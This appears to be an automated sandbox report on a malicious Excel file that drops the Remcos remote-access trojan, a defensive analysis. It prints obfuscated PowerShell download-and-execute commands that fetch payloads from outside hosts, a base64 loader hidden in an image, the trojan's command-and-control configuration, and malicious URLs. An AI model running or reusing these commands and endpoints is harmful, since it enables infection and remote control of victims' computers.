iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyA
                  Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3912, TargetFilename: C:\Users\user\AppData\Local\Temp\a5lgtqgr.t5c.ps1

                  Data Obfuscation

                  barindex
                  Sigma detected: Powershell download and load assembly
                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.SDER/zob/ppmax/551.391.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.SDER/zob/ppmax/551.391.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ?
                  Sigma detected: Dot net compiler compiles file from suspicious location
                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI='+[cHAR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3912, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.cmdline", ProcessId: 4012, ProcessName: csc.exe

                  Stealing of Sensitive Information

                  barindex
                  Sigma detected: Remcos
                  Source: Registry Key setAuthor: Joe Security: Data: Details: F8 8C A9 9F CF 8C 5C 85 10 76 EE EF DE 40 A4 E9 A5 CB ED 98 76 D2 A8 DC A7 72 C5 87 EC 9F 44 3E 3A 88 11 97 5A 15 66 E0 22 FF FD 1D 93 8E DA A2 58 86 91 11 B1 1F B9 46 4D 2C 5B 80 02 73 52 AB 13 4B 29 9B 0A D2 0D 28 22 8C C7 05 3F 97 72 05 84 F6 5E EB 10 D8 BC 85 04 1F 3A 6E C9 5D 5D 6A 9F 62 F6 03 8B AB 98 6C 51 7D 4B 76 DC 81 EC 7A 26 70 , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 3024, TargetObject: HKEY_CURRENT_USER\Software\Rmc-CJ3HJ1\exepath

                  Suricata Signatures

                  Timestamp:2024-08-28T06:56:30.438197+0200
                  SID:2024449
                  Severity:1
                  Source Port:49166
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Attempted User Privilege Gain
                  Timestamp:2024-08-28T06:56:30.438199+0200
                  SID:2024197
                  Severity:1
                  Source Port:80
                  Destination Port:49166
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-28T06:56:28.368449+0200
                  SID:2024449
                  Severity:1
                  Source Port:49164
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Attempted User Privilege Gain
                  Timestamp:2024-08-28T06:56:50.218487+0200
                  SID:2024449
                  Severity:1
                  Source Port:49175
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Attempted User Privilege Gain
                  Timestamp:2024-08-28T06:57:02.959463+0200
                  SID:2049038
                  Severity:1
                  Source Port:443
                  Destination Port:49176
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-28T06:56:44.497830+0200
                  SID:2020423
                  Severity:1
                  Source Port:80
                  Destination Port:49169
                  Protocol:TCP
                  Classtype:Exploit Kit Activity Detected
                  Timestamp:2024-08-28T06:56:44.497830+0200
                  SID:2020425
                  Severity:1
                  Source Port:80
                  Destination Port:49169
                  Protocol:TCP
                  Classtype:Exploit Kit Activity Detected
                  Timestamp:2024-08-28T06:56:46.416632+0200
                  SID:2036594
                  Severity:1
                  Source Port:49170
                  Destination Port:14645
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-28T06:56:47.844263+0200
                  SID:2803304
                  Severity:3
                  Source Port:49172
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-28T06:56:28.368474+0200
                  SID:2024197
                  Severity:1
                  Source Port:80
                  Destination Port:49164
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-28T06:57:03.728683+0200
                  SID:2020423
                  Severity:1
                  Source Port:80
                  Destination Port:49177
                  Protocol:TCP
                  Classtype:Exploit Kit Activity Detected
                  Timestamp:2024-08-28T06:57:03.728683+0200
                  SID:2020425
                  Severity:1
                  Source Port:80
                  Destination Port:49177
                  Protocol:TCP
                  Classtype:Exploit Kit Activity Detected
                  Timestamp:2024-08-28T06:56:43.690731+0200
                  SID:2049038
                  Severity:1
                  Source Port:443
                  Destination Port:49168
                  Protocol:TCP
                  Classtype:A Network Trojan was detected

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus detection for URL or domain
                  Source: https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpgURL Reputation: Label: malware
                  Found malware configuration
                  Source: 0000001C.00000002.476275781.0000000000511000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "cloudsave.duckdns.org:14645:1", "Assigned name": "zynova", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-CJ3HJ1", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                  Multi AV Scanner detection for domain / URL
                  Source: http://192.3.193.155/xampp/boz/wecreatedbuttersmoothbutterthings.tIFVirustotal: Detection: 9%Perma Link
                  Source: http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.htaVirustotal: Detection: 10%Perma Link
                  Source: http://192.3.193.155/xampp/boz/REDS.txtVirustotal: Detection: 9%Perma Link
                  Multi AV Scanner detection for submitted file
                  Source: PO_304234.xlsVirustotal: Detection: 19%Perma Link
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 28.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.powershell.exe.133a4b98.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.powershell.exe.133a4b98.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001C.00000002.476275781.0000000000511000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.842095725.0000000000631000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.842095725.0000000000615000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.443270991.0000000012F3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2848, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3024, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4092, type: MEMORYSTR
                  Machine Learning detection for sample
                  Source: PO_304234.xlsJoe Sandbox ML: detected
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,28_2_004338C8
                  Source: powershell.exe, 0000000E.00000002.443270991.0000000012F3D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_d18ed603-b

                  Exploits

                  barindex
                  Yara detected UAC Bypass using CMSTP
                  Source: Yara matchFile source: 28.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.powershell.exe.133a4b98.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.powershell.exe.133a4b98.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.443270991.0000000012F3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2848, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4092, type: MEMORYSTR

                  Privilege Escalation

                  barindex
                  Contains functionality to bypass UAC (CMSTPLUA)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_00407538 _wcslen,CoGetObject,28_2_00407538
                  Source: unknownHTTPS traffic detected: 207.241.232.154:443 -> 192.168.2.22:49168 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 207.241.232.154:443 -> 192.168.2.22:49176 version: TLS 1.0
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: unknownHTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49163 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49165 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49171 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49174 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49173 version: TLS 1.2
                  Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb\ source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.484568461.0000000012648000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\mjo4tj0d\mjo4tj0d.pdb source: powershell.exe, 00000014.00000002.464588377.0000000002563000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.pdb source: powershell.exe, 00000007.00000002.423275187.00000000025E3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\mjo4tj0d\mjo4tj0d.pdbhPB source: powershell.exe, 00000014.00000002.464588377.0000000002563000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
